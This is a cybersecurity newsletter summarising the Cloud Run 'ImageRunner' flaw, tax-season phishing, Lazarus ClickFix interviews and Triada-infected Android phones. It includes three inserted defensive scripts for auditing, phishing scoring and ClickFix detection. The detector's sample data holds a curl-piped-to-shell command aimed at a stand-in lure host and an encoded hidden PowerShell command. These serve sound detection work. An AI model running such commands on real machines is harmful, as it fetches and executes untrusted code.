Apr 05 2025
Welcome to Gone Phishing, your weekly cybersecurity newsletter that understands this is what happens when you Musk it for a chocolate buskuit 😂😂😂 The world economy left the chat 💀💀💀
Patch of the Week! 🩹
First things first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the week. Okay, that’s it… 😳
Congrats to Google, the cybercriminals are no match… for your patch! 🩹
🚨⚙️ Google Cloud Run Vulnerability Revealed: “ImageRunner” 🐛🚀
Cybersecurity researchers just uncovered ImageRunner, a now-patched privilege escalation flaw in Google Cloud Platform's Cloud Run that could’ve let attackers steal private container images and even inject malware into deployments 😨🐍
🔍 What was the issue?
Malicious users with limited permissions (run.services.update + iam.serviceAccounts.actAs) could:
🔧 Edit Cloud Run services
📦 Pull private container images
🧬 Inject malicious code
Target: images stored in Google Artifact Registry or Google Container Registry in the same project 😬
💣 Potential impact:
Secrets stolen 🗝️
Sensitive data exfiltrated 📤
Reverse shells launched 🐚
All by tricking Cloud Run into using infected container images—like a software supply chain attack from inside the cloud ☁️💥
🛡️ What did Google do?
🔒 As of January 28, 2025, Google patched the issue. Now, any user or service account must have explicit read access to deploy container images. No more sneaky side-loading 😤
✅ You now need the Artifact Registry Reader role (roles/artifactregistry.reader) to deploy from private registries.
📌 Tenable, who discovered the bug, calls this kind of vulnerability “Jenga”—because when one cloud service gets wobbly, the rest stacked on top become vulnerable too 🧱🪜
🧠 Reminder: Cloud security isn’t just IAM policies—it's the invisible glue between services that attackers love to exploit.
🔧 If you're using GCP Cloud Run, make sure:
Your IAM roles are tight 🎯
Your image permissions are reviewed 🔍
You stay up-to-date on patches! 🔐
💡 Defenders, stay alert: the cloud can be a blessing or a backdoor—depending on how well you secure it 🛡️💻
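One way to act on the “tight IAM roles” reminder is to audit who could redeploy Cloud Run services in the first place. This is an added example, not code from the newsletter, Google or Tenable: it reads the JSON that `gcloud projects get-iam-policy PROJECT --format=json` prints, finds every principal holding both a Cloud Run deploy role and a role that grants `iam.serviceAccounts.actAs`, and reports whether that principal also holds the explicit Artifact Registry read access Google now requires. The role-to-permission mapping and the sample policy are assumptions constructed for the demo; custom roles are not expanded.

```python
"""Audit a GCP project IAM policy for principals who could redeploy Cloud Run services.

Added example, not from the newsletter, Google or Tenable. Input is the JSON that
`gcloud projects get-iam-policy PROJECT --format=json` prints (constructed sample below).
"""
import json
import sys

# Assumption: these predefined roles carry the two permissions the article names
# (run.services.update and iam.serviceAccounts.actAs). Custom roles are not expanded,
# and conditional bindings are counted as unconditional, which errs on the side of review.
DEPLOY_ROLES = {"roles/run.developer", "roles/run.admin", "roles/editor", "roles/owner"}
ACTAS_ROLES = {"roles/iam.serviceAccountUser", "roles/editor", "roles/owner"}
# Roles that grant the explicit registry read access Google now requires for deploys.
REGISTRY_READ_ROLES = {"roles/artifactregistry.reader", "roles/artifactregistry.writer",
                       "roles/artifactregistry.repoAdmin", "roles/artifactregistry.admin"}

# Constructed sample policy: a CI service account with explicit grants, and a developer
# who can redeploy but holds no registry read role of their own.
SAMPLE_POLICY = {
    "bindings": [
        {"role": "roles/run.developer",
         "members": ["serviceAccount:ci-deployer@example-project.iam.gserviceaccount.com",
                     "user:dev@example.com"]},
        {"role": "roles/iam.serviceAccountUser",
         "members": ["serviceAccount:ci-deployer@example-project.iam.gserviceaccount.com",
                     "user:dev@example.com"]},
        {"role": "roles/artifactregistry.reader",
         "members": ["serviceAccount:ci-deployer@example-project.iam.gserviceaccount.com"]},
        {"role": "roles/viewer", "members": ["user:auditor@example.com"]},
    ]
}


def roles_by_member(policy):
    """Invert the role -> members bindings into member -> set of roles."""
    out = {}
    for binding in policy.get("bindings", []):
        for member in binding.get("members", []):
            out.setdefault(member, set()).add(binding["role"])
    return out


def audit(policy):
    """Return every principal that can both update Cloud Run services and act as a
    service account, with a note on whether it holds explicit registry read access."""
    findings = []
    for member, roles in sorted(roles_by_member(policy).items()):
        if roles & DEPLOY_ROLES and roles & ACTAS_ROLES:
            findings.append({
                "member": member,
                "explicit_registry_read": bool(roles & REGISTRY_READ_ROLES),
                # Custom roles (projects/... or organizations/...) need manual review.
                "custom_roles": sorted(r for r in roles if not r.startswith("roles/")),
                "roles": sorted(roles),
            })
    return findings


if __name__ == "__main__":
    # Usage: python audit_run_iam.py policy.json   (falls back to the constructed sample)
    policy = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_POLICY
    for f in audit(policy):
        flag = "ok    " if f["explicit_registry_read"] else "REVIEW"
        print(f"{flag} {f['member']}: {', '.join(f['roles'])}")
```

Principals listed as REVIEW are the ones that would have been interesting to an ImageRunner-style attacker before the patch and are still worth trimming under least privilege afterwards: if a human user never needs to redeploy, the deploy and actAs pair should not sit on their account at all.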
Now, on to this week’s hottest cybersecurity news stories:
💸 Tax doesn’t need to be taxing!! Microsoft says otherwise ⚠️
🧟 Lazarus rises from the dead… AGAIN! Change the record 💿
📲 2,600+ Android phones infected w/ Triada malware… Beware ☠️
Microsoft has issued a high-alert warning about multiple phishing campaigns weaponizing tax season as a lure to steal credentials and drop malware. The campaigns are part of a broader phishing-as-a-service (PhaaS) ecosystem dubbed RaccoonO365, enabling threat actors to bypass traditional detection methods and launch highly targeted attacks.
🧨 Key Threats & Techniques
🔹 Themes Used: Fake tax docs, Microsoft 365 login pages, and Docusign requests
🔹 Delivery Methods:
✔️ PDF attachments with URL shorteners (Rebrandly)
✔️ PDFs with QR codes
✔️ Spoofed emails using legit file-sharing & collaboration services
🔹 Redirect Chains: Link > URL shortener > fake login/malware page
🔹 Phishing kits powered by RaccoonO365 PhaaS
🕵️‍♂️ Notable Payloads Delivered
● BruteRatel C4 (BRc4) – Red-teaming post-exploitation
● Latrodectus – Malware loader (evolved in Feb 2025)
● AHKBot – Credential theft & screenshot exfiltration
● GuLoader – Payload delivery platform
● Remcos RAT – Full remote control
⚠️ BRc4 & Latrodectus were dropped via tax-themed PDFs that evaluated a user's IP/system to decide whether to send malware or a harmless file.
🎯 Campaigns & Targets
📅 February 2025 Campaigns:
● Targeted 2,300+ U.S. organizations (engineering, IT, consulting sectors)
● Emails had empty bodies but malicious PDFs with QR codes
● Redirected to fake Microsoft 365 login pages via RaccoonO365
📅 Another campaign used Facebook ads to lure victims to a fake Windows 11 Pro download site, dropping the Latrodectus loader via BruteRatel.
🛡️ Advanced Obfuscation Tactics
💠 Fake file types (e.g., .lnk files made to look like tax docs)
💠 QR codes used to bypass secure email gateways (SEGs)
💠 Browser-in-the-browser (BitB) attacks mimicking login popups
💠 Abuse of legit services: DocuSign, Adobe, Dropbox, Canva, Zoho
💠 Use of open redirects & URL shorteners to hide phishing links
🧰 How to Stay Protected
✅ Block macros & disable autorun
✅ Use phishing-resistant MFA (e.g., hardware tokens, passkeys)
✅ Educate users about tax-season phishing scams
✅ Implement network protection to block outbound connections to known malicious domains
✅ Leverage modern browsers with phishing protection built-in
Microsoft’s findings show a sophisticated evolution of phishing, where attackers are blending social engineering with stealthy malware loaders and legitimate-looking infrastructure. With tax season being a peak period for these attacks, organizations must remain hyper-vigilant. 🧾💣
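The traits Microsoft describes (an empty body carrying a PDF, tax or DocuSign wording in the subject, links routed through a URL shortener) are easy to turn into a mail-gateway heuristic. The script below is an added example, not from the newsletter or from Microsoft: it scores a raw RFC 822 message on those three signals using only the standard library. The shortener list, lure words and the three sample messages are constructed for the demo, and a real deployment would pair this with QR-code decoding of PDF attachments, which this example does not attempt.

```python
"""Score a raw e-mail for the tax-season lure traits described in the article.

Added example, not from the newsletter or from Microsoft. Sample messages and the
shortener / lure-word lists are constructed for the demo.
"""
import re
from email import message_from_string

# Assumption: a small starter list; production blocklists are far longer.
SHORTENER_DOMAINS = {"rebrand.ly", "bit.ly", "tinyurl.com", "t.co"}
LURE_WORDS = re.compile(r"\b(tax|irs|w-?2|1099|refund|docusign|microsoft 365)\b", re.I)
URL_HOST = re.compile(r"https?://([^/\s>\"']+)", re.I)


def body_text_and_pdfs(msg):
    """Collect the visible text parts and count PDF attachments."""
    text, pdfs = [], 0
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        filename = part.get_filename()
        if filename and filename.lower().endswith(".pdf"):
            pdfs += 1
        elif not filename and part.get_content_type() in ("text/plain", "text/html"):
            payload = part.get_payload(decode=True) or b""
            text.append(payload.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(text), pdfs


def score_message(raw):
    """Return a score (number of signals hit) and the reasons, for triage or a SEG rule."""
    msg = message_from_string(raw)
    body, pdfs = body_text_and_pdfs(msg)
    reasons = []
    if LURE_WORDS.search(msg.get("Subject", "")):
        reasons.append("tax/lure wording in subject")
    if pdfs and not body.strip():
        reasons.append("empty body with PDF attachment")
    hosts = {h.lower() for h in URL_HOST.findall(body)}
    hit = hosts & SHORTENER_DOMAINS
    if hit:
        reasons.append("link via URL shortener: " + ", ".join(sorted(hit)))
    return {"score": len(reasons), "reasons": reasons}


# Constructed samples. The PDF payload is just the bytes "%PDF-1.4\n" in base64.
EMPTY_BODY_PDF = """\
From: "Payroll" <payroll@example-lure.test>
To: staff@example.com
Subject: Your 2024 tax refund document
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="B1"

--B1
Content-Type: text/plain; charset="utf-8"

--B1
Content-Type: application/pdf; name="refund.pdf"
Content-Disposition: attachment; filename="refund.pdf"
Content-Transfer-Encoding: base64

JVBERi0xLjQK
--B1--
"""

SHORTENER_LINK = """\
From: "Contracts" <contracts@example-lure.test>
To: staff@example.com
Subject: Please sign: DocuSign request
Content-Type: text/plain; charset="utf-8"

Review and sign here: https://rebrand.ly/abc123
"""

BENIGN = """\
From: "Alice" <alice@example.com>
To: staff@example.com
Subject: Team lunch Friday
Content-Type: text/plain; charset="utf-8"

Menu is on the intranet: https://intranet.example.com/lunch
"""

if __name__ == "__main__":
    for name, raw in [("empty-body-pdf", EMPTY_BODY_PDF),
                      ("shortener", SHORTENER_LINK), ("benign", BENIGN)]:
        print(name, score_message(raw))
```

A score of 2 or more on a constructed sample like the first one is what the February campaign would have looked like at the gateway: lure subject, no body text, PDF attached. Tune the threshold on your own mail corpus rather than trusting the toy lists here.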
Consensus is the world’s longest-running gathering of the global crypto, blockchain, and AI communities.
Celebrated as ‘The Super Bowl of Blockchain’, Consensus will welcome 20,000 attendees shaping the decentralized digital economy to Toronto this May 14-16.
Ready to invest in your future?
Attending is your best bet.
Register & Save 20% with BEEHIIV
A new North Korean hacking campaign is using fake job interviews and the ClickFix technique to infect job seekers in the cryptocurrency sector with a newly discovered Go-based backdoor called GolangGhost. The attack, tracked as ClickFake Interview, is a continuation of the Contagious Interview campaign linked to the Lazarus Group, a hacking unit tied to North Korea’s Reconnaissance General Bureau (RGB).
🎯 Key Targets & Attack Methodology
🔹 Targets:
✔️ Centralized finance (CeFi) companies (Coinbase, Kraken, KuCoin, Tether, etc.)
✔️ Job seekers in business development, asset management, and DeFi
🔹 Attack Flow:
1️⃣ Hackers pose as recruiters on LinkedIn/X and invite targets to a video interview.
2️⃣ Victims are directed to a fake video interview platform (e.g., "Willo").
3️⃣ The platform presents a fake error message requiring a “camera driver” download.
4️⃣ Victims are instructed to execute a malicious script via Command Prompt (Windows) or Terminal (macOS).
5️⃣ The script drops FROSTYFERRET (a stealer) and GolangGhost (a backdoor).
🔹 Key Malware Used
● GolangGhost – Backdoor for data theft & remote control
● FROSTYFERRET – Stealer disguised as a Chrome camera permission prompt
● FERRET – Initial malware loader
🕵️ Advanced Social Engineering via ClickFix
💠 Uses fake job postings to lure victims
💠 Mimics real video interview platforms
💠 ClickFix method tricks users into manually running malicious scripts
💠 Exploits victim trust in the interview process
🛑 macOS users are tricked into entering their system password, likely for iCloud Keychain theft.
💼 North Korea’s Expanding IT Worker Scheme in Europe
📢 Google Threat Intelligence Group (GTIG) reports a global expansion of North Korea’s fraudulent IT worker operations into Europe.
🔹 Key Trends:
✔️ North Koreans posing as remote IT workers to infiltrate Western firms
✔️ Fake identities claiming to be from Italy, Japan, Vietnam, and the U.S.
✔️ Work in web development, blockchain, bot development
✔️ Use of GitHub to build fake portfolios
🔹 Recent Tactics:
✔️ Targeting companies with BYOD (Bring Your Own Device) policies
✔️ Extortion – demanding ransom from employers to prevent data leaks
🚨 "Europe needs to wake up fast. North Korea’s cyber threats are not just a U.S. problem." – Google Threat Intelligence Group
🛡️ How to Stay Protected
✅ Verify job offers – Don’t download software for interviews
✅ Use endpoint security – Block unauthorized script execution
✅ Be wary of LinkedIn/X job offers from unknown recruiters
✅ Adopt strong authentication – Enable phishing-resistant MFA
✅ Monitor for fake employee identities in remote hiring processes
North Korea continues to innovate in cybercrime, blending social engineering, supply chain infiltration, and IT worker fraud to fund its regime. As cryptocurrency remains a prime target, businesses and job seekers must stay vigilant against evolving tactics. 🛡️
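The defining ClickFix step is that the victim pastes a download-and-run command into their own terminal, so the strongest endpoint signal is “interactive shell parent plus a command that fetches something and feeds it straight to an interpreter”. The script below is an added example, not from the newsletter or from any vendor: it runs two such heuristics over constructed process-creation events and ranks interactive-terminal hits first. The parent-process list, the rules and the sample events are assumptions; map your EDR’s field names onto `host`, `user`, `parent` and `cmd` before using it.

```python
"""Flag process events that look like a user pasting a ClickFix-style command into a terminal.

Added example, not from the newsletter or from any vendor. Events are constructed.
"""
import re

# Assumption: parent images that mean a human typed or pasted the command interactively.
INTERACTIVE_PARENTS = {"Terminal", "iTerm2", "cmd.exe", "powershell.exe", "WindowsTerminal.exe"}

# Heuristics for "download something and hand it straight to an interpreter".
RULES = [
    ("download piped into a shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.I)),
    ("powershell hidden window or encoded command",
     re.compile(r"\bpowershell(\.exe)?\b.*\s-(w|windowstyle)\s+hidden"
                r"|\bpowershell(\.exe)?\b.*\s-e(nc|ncodedcommand)?\s", re.I)),
]

# Constructed sample events. The first mirrors the article's "camera driver" step on macOS;
# the last is a CI job doing the same thing non-interactively, which ranks lower.
SAMPLE_EVENTS = [
    {"host": "mac-01", "user": "alice", "parent": "Terminal",
     "cmd": "curl -fsSL https://example-lure.test/camera-driver.sh | sh"},
    {"host": "win-02", "user": "bob", "parent": "cmd.exe",
     "cmd": "powershell -w hidden -enc QUJD"},   # QUJD is base64("ABC"), a placeholder
    {"host": "mac-03", "user": "carol", "parent": "Terminal", "cmd": "git pull --rebase"},
    {"host": "ci-01", "user": "svc-ci", "parent": "bash",
     "cmd": "curl -fsSL https://get.example-tool.test/install.sh | sh"},
]


def classify(event):
    """Return the name of the first matching rule, or None."""
    for name, pattern in RULES:
        if pattern.search(event["cmd"]):
            return name
    return None


def find_clickfix_candidates(events):
    """One finding per matching event; 'interactive' marks a terminal parent, the
    strongest ClickFix signal because the victim runs the command by hand."""
    findings = []
    for ev in events:
        reason = classify(ev)
        if reason is None:
            continue
        findings.append({
            "host": ev["host"], "user": ev["user"], "reason": reason,
            "interactive": ev["parent"] in INTERACTIVE_PARENTS,
        })
    # Stable sort: interactive hits first, original order otherwise.
    return sorted(findings, key=lambda f: not f["interactive"])


if __name__ == "__main__":
    for f in find_clickfix_candidates(SAMPLE_EVENTS):
        prio = "HIGH" if f["interactive"] else "low "
        print(f"{prio} {f['host']} {f['user']}: {f['reason']}")
```

Pair the HIGH findings with the “don’t download software for interviews” advice above: a developer laptop whose Terminal suddenly pipes a download into `sh` during a supposed video interview is exactly the event an analyst wants paged on, while the CI host is routine and only needs a baseline.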
Be the smartest person in the room by reading 1440! Dive into 1440, where 4 million Americans find their daily, fact-based news fix. We navigate through 100+ sources to deliver a comprehensive roundup from every corner of the internet – politics, global events, business, and culture, all in a quick, 5-minute newsletter. It's completely free and devoid of bias or political influence, ensuring you get the facts straight. Subscribe to 1440 today.
🚨 Fake Android Phones Preloaded with Malware Targeting Users Worldwide 🌍
Counterfeit smartphones are being sold at reduced prices, but they come preloaded with a dangerous Android malware called Triada. The latest version of this malware gives attackers full control over infected devices, allowing them to steal sensitive data, hijack cryptocurrency transactions, and spread malware via messaging apps.
🛑 Affected Users: More than 2,600 devices worldwide, majority in Russia
📅 Attack Window: March 13 – 27, 2025
🔎 Malware: Triada RAT (Remote Access Trojan)
📌 What is Triada?
Triada is a modular Android malware first discovered in 2016 that has evolved into a sophisticated backdoor. It can:
🔹 Steal user credentials from Telegram, TikTok, and other social apps
🔹 Send and delete WhatsApp and Telegram messages without the user’s knowledge
🔹 Replace cryptocurrency wallet addresses in clipboard (clipper attack)
🔹 Monitor web browser activity and manipulate links
🔹 Replace phone numbers during calls
🔹 Intercept SMS messages and subscribe victims to premium SMS services
🔹 Download additional malware
🔹 Block network connections to avoid detection
🔥 How is Triada Spread?
🚨 Preloaded in Counterfeit Android Devices
✔️ Triada is embedded in the system firmware during manufacturing
✔️ Users cannot remove it without flashing a clean system image
✔️ Sold through third-party marketplaces and supply chain compromises
📡 Previously Spread via Malicious Apps
✔️ Fake WhatsApp mods (FMWhatsApp, YoWhatsApp)
✔️ Fake Android framework backdoors (BADBOX campaign)
💡 Google’s 2019 investigation found a third-party vendor called Yehuo/Blazefire was responsible for infecting system images with Triada.
🛑 Why is This Dangerous?
1️⃣ Difficult to Remove – It's embedded in the system framework of the phone.
2️⃣ Spreads via Messaging Apps – Can send malware-laden messages from your WhatsApp/Telegram.
3️⃣ Steals Crypto Funds – Can hijack and replace wallet addresses.
4️⃣ Intercepts Calls & Messages – Perfect for espionage and fraud.
5️⃣ Generates Massive Revenue for Hackers – Triada authors have transferred $270,000+ in cryptocurrency in just nine months.
🛡️ How to Protect Yourself
✅ Avoid buying off-brand or counterfeit Android devices
✅ Purchase from reputable retailers and official brand stores
✅ Check for unusual permissions & network activity
✅ Use security apps that can detect system malware
✅ Keep your device updated and avoid sideloading apps
✅ Be cautious of WhatsApp mods & unofficial APKs
🚨 Triada remains one of the most complex and dangerous Android threats.
Hackers continue to compromise supply chains to pre-install malware on devices before they even reach consumers.
🔥 More Android Threats Emerging
🔴 Crocodilus & TsarBot – Android banking trojans targeting 750+ financial apps
🔴 Salvador Stealer – Masquerades as an Indian banking app to steal sensitive user data
🔴 Cosiloon – Another malware pre-installed on low-end Android phones
As hackers refine their tactics, users must be extra vigilant when purchasing Android devices and installing apps. 📲🔒
🗞️ Extra, Extra! Read all about it! 🗞️
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅
💵Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓
📈Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾
Let us know what you think.
So long and thanks for reading all the phish!